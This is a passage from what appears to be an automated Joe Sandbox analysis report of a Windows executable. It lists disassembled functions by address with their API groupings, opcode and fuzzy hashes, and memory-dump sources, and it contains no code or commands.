                                                                          • Instruction ID: b07abe484a34e2148ec9347fd044f84906238bb777650993bad232bba32f9e37
                                                                          • Opcode Fuzzy Hash: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                                          • Instruction Fuzzy Hash: 4651E022B0AA0189EF50AB62C8445ADA3B6FB44B94FD54131DE1D537A9EF3CD543C720
                                                                          Function 00007FF7ADC943C8 Relevance: 6.1, APIs: 4, Instructions: 126networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$socket
                                                                          • String ID:
                                                                          • API String ID: 1881357543-0
                                                                          • Opcode ID: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                                          • Instruction ID: 288e87e2a83f058f17a7b30aff560a5d841aad4d2ac51eb6adebe53a09471467
                                                                          • Opcode Fuzzy Hash: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                                          • Instruction Fuzzy Hash: 2A41922171E69289DB14BF12A440669E791FB89FE0FC54534EE5E17BA6EF3CD0028B50
                                                                          Function 00007FF7ADC85DA4 Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 3321077145-0
                                                                          • Opcode ID: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                                          • Instruction ID: 5eb1b84694b27d62a37a110819b98fc0f4cd62f4e54a37cb2d0fd14444be7488
                                                                          • Opcode Fuzzy Hash: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                                          • Instruction Fuzzy Hash: 7141E866A09B4685DB14EF22E49016DA360FB88FD0FC99432EF4E47B76EE3CE4418350
                                                                          Function 00007FF7ADCAF014 Relevance: 6.1, APIs: 4, Instructions: 107windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 1352109105-0
                                                                          • Opcode ID: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                          • Instruction ID: a4df9d7f18047789cb2b0feddfd5b548ea07e67fb4e474d70e86198907e95b2e
                                                                          • Opcode Fuzzy Hash: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                          • Instruction Fuzzy Hash: 9C418032A0FB4689EB51AF15D8946B9B7B1FB48B94FD64535EA1D43370EF38E8428310
                                                                          Function 00007FF7ADCAAA04 Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$DrawInfoInsert
                                                                          • String ID:
                                                                          • API String ID: 3076010158-0
                                                                          • Opcode ID: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
                                                                          • Instruction ID: 56570977dfa14c6a8a129b7075fa2f6866453d1713712f0735cdcc479b984b2a
                                                                          • Opcode Fuzzy Hash: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
                                                                          • Instruction Fuzzy Hash: D241AC32A0AB418AEB54DF62E4442AD77A2FB48F94FA24436CE0D53774DF38E942C750
                                                                          Function 00007FF7ADC3C72C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                          • String ID:
                                                                          • API String ID: 4141327611-0
                                                                          • Opcode ID: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                                          • Instruction ID: 037f9c7ee7b10ec8d647dd7387ff3f28c965680e99c226d6a4cbf2d7124b07e9
                                                                          • Opcode Fuzzy Hash: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                                          • Instruction Fuzzy Hash: 6B419632A0E7424EF769AB10D24437DE291EF41B90FD64130DE4906AE5FFACD9439B21
                                                                          Function 00007FF7ADC7BE00 Relevance: 6.1, APIs: 4, Instructions: 101processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                          • String ID:
                                                                          • API String ID: 1083639309-0
                                                                          • Opcode ID: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                                          • Instruction ID: 502514eaf44b91383fe7b178c2e0aedde2d6d50fa07d47123ae1cd1729a56c83
                                                                          • Opcode Fuzzy Hash: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                                          • Instruction Fuzzy Hash: 8441A226A1EA8289E710FF51E4441ADE360FB84B84FD64032EA4E437A5EF7CD506CB10
                                                                          Function 00007FF7ADC78B38 Relevance: 6.1, APIs: 4, Instructions: 96keyboardwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                          • String ID:
                                                                          • API String ID: 432972143-0
                                                                          • Opcode ID: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
                                                                          • Instruction ID: b6ba51529c9e76947b18af3365ca0d169a57274c7fc1473fd57c3db9ab3849b1
                                                                          • Opcode Fuzzy Hash: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
                                                                          • Instruction Fuzzy Hash: F6413FA1A0E68249FB30DB2194106F9A6A0FF44B90FD60132D79E136F4EE3CD583CB60
                                                                          Function 00007FF7ADCAC580 Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow$InvalidateMessageRectSend
                                                                          • String ID:
                                                                          • API String ID: 3340791633-0
                                                                          • Opcode ID: 41522454ef5ffe58f3c47094a62836e99305b084494bc2ef8d406c22aeaeab5d
                                                                          • Instruction ID: f48816a719e6bec109061596e93cb69c7b66784f014d18bfbfd8ab2fce41e40d
                                                                          • Opcode Fuzzy Hash: 41522454ef5ffe58f3c47094a62836e99305b084494bc2ef8d406c22aeaeab5d
                                                                          • Instruction Fuzzy Hash: DA419225E1E5468DFB64EB94D5003F8A762EB84B94FDA5532D60D036F1EE3CE8838720
                                                                          Function 00007FF7ADC78CAC Relevance: 6.1, APIs: 4, Instructions: 89keyboardwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                          • String ID:
                                                                          • API String ID: 432972143-0
                                                                          • Opcode ID: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
                                                                          • Instruction ID: a71ebbef0e56d52d4c0a35e8480d47d8619bd3cd989d6e57a12880b7b3220c33
                                                                          • Opcode Fuzzy Hash: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
                                                                          • Instruction Fuzzy Hash: D531DA21A0D6824EEB70AB2594007F9ABA0EF64B54FD60231DB99037E5EE3CD653CB10
                                                                          Function 00007FF7ADC43D98 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7ADC3A27B,?,?,?,00007FF7ADC3A236), ref: 00007FF7ADC43DB1
                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7ADC3A27B,?,?,?,00007FF7ADC3A236), ref: 00007FF7ADC43E13
                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7ADC3A27B,?,?,?,00007FF7ADC3A236), ref: 00007FF7ADC43E4D
                                                                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7ADC3A27B,?,?,?,00007FF7ADC3A236), ref: 00007FF7ADC43E77
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                          • String ID:
                                                                          • API String ID: 1557788787-0
                                                                          • Opcode ID: 37f34cb981ae4bb04f05b5558213e54d78b065c70e8e78ee0f6269086b9b9312
                                                                          • Instruction ID: 28c9fdb306be6eade0ceebc3440217950462463ce18e2f72720b18c947781340
                                                                          • Opcode Fuzzy Hash: 37f34cb981ae4bb04f05b5558213e54d78b065c70e8e78ee0f6269086b9b9312
                                                                          • Instruction Fuzzy Hash: 87218261B6E75185E624AF16644802AF6A5FB84FD0BC94134DA8E23BE4EF3CE4538710
                                                                          Function 00007FF7ADCAF8A8 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long
                                                                          • String ID:
                                                                          • API String ID: 847901565-0
                                                                          • Opcode ID: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                          • Instruction ID: 732130d2836df5a43f46996d128b046c5ec4d45088fcaf2af28d234b69ceb160
                                                                          • Opcode Fuzzy Hash: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                          • Instruction Fuzzy Hash: 3321AF21A1EB4189EA10AB659894379A651EB85BA0FD64730E96D077F4EF3CE443C310
                                                                          Function 00007FF7ADCB108C Relevance: 6.1, APIs: 4, Instructions: 71windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                          • String ID:
                                                                          • API String ID: 2864067406-0
                                                                          • Opcode ID: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                                          • Instruction ID: de8cffac857c341d2afeb197790a36fda9bdabe7477c706bf3e72197d021b7c6
                                                                          • Opcode Fuzzy Hash: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                                          • Instruction Fuzzy Hash: CD313A26A0DA4589EB20EB16E4943B9B360FB88F94FD54231DA4D43BB8EF3CD446C710
                                                                          Function 00007FF7ADC750E4 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                          • String ID: cdecl
                                                                          • API String ID: 4031866154-3896280584
                                                                          • Opcode ID: 9543eb87236cbe86fa524af2d72e3452b2187adb33a089d16778c3ede46c2dfa
                                                                          • Instruction ID: 4ed00fcf234b06f5e5b900046405ff6107d83875302a68cd473d47ed91b9bd13
                                                                          • Opcode Fuzzy Hash: 9543eb87236cbe86fa524af2d72e3452b2187adb33a089d16778c3ede46c2dfa
                                                                          • Instruction Fuzzy Hash: E321A021A1E3418AEB14BF16A850178B361EF98FD1BCA4134DA5E473A4EF3CE4528714
                                                                          Function 00007FF7ADC6D6A0 Relevance: 6.1, APIs: 4, Instructions: 67memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                                          • String ID:
                                                                          • API String ID: 837644225-0
                                                                          • Opcode ID: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                          • Instruction ID: 058a3b82da8310aa1cea1c50947bb1bd8bee8830e6af2c673780c122a29042a4
                                                                          • Opcode Fuzzy Hash: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                          • Instruction Fuzzy Hash: CE21B132A1AA418AEB05EF61E404768B3A5FB44F91FD64135DA0D03768EF3CD842C711
                                                                          Function 00007FF7ADCB2264 Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00007FF7ADC02A54: GetWindowLongPtrW.USER32 ref: 00007FF7ADC02A71
                                                                          • GetClientRect.USER32(?,?,?,?,?,00007FF7ADC4AA36,?,?,?,?,?,?,?,?,?,00007FF7ADC027AF), ref: 00007FF7ADCB22C4
                                                                          • GetCursorPos.USER32(?,?,?,?,?,00007FF7ADC4AA36,?,?,?,?,?,?,?,?,?,00007FF7ADC027AF), ref: 00007FF7ADCB22CF
                                                                          • ScreenToClient.USER32 ref: 00007FF7ADCB22DD
                                                                          • DefDlgProcW.USER32(?,?,?,?,?,00007FF7ADC4AA36,?,?,?,?,?,?,?,?,?,00007FF7ADC027AF), ref: 00007FF7ADCB231F
                                                                            • Part of subcall function 00007FF7ADCAE894: LoadCursorW.USER32 ref: 00007FF7ADCAE945
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ClientCursor$LoadLongProcRectScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 1626762757-0
                                                                          • Opcode ID: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
                                                                          • Instruction ID: 589f364913ac37eec9104eb45c68ee0ea57945ffca5b886e35bfc9195d0b7b8d
                                                                          • Opcode Fuzzy Hash: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
                                                                          • Instruction Fuzzy Hash: 93213036A1DA428AEB14EB05E490169F365FB88F80FD60531DB4D47B65EF3CE942C720
                                                                          Function 00007FF7ADC32FB8 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _ctrlfp
                                                                          • String ID:
                                                                          • API String ID: 697997973-0
                                                                          • Opcode ID: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                                          • Instruction ID: 03ba4c66f50dbc2b7224ee4fd829df3cdef53178d5c21e0daf416d0acb61e52f
                                                                          • Opcode Fuzzy Hash: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                                          • Instruction Fuzzy Hash: 23110B21D0D94185E614EE38A14107FD371FF9A780FE55230FB890A6B5EF7DD4428B10
                                                                          Function 00007FF7ADC7CF68 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
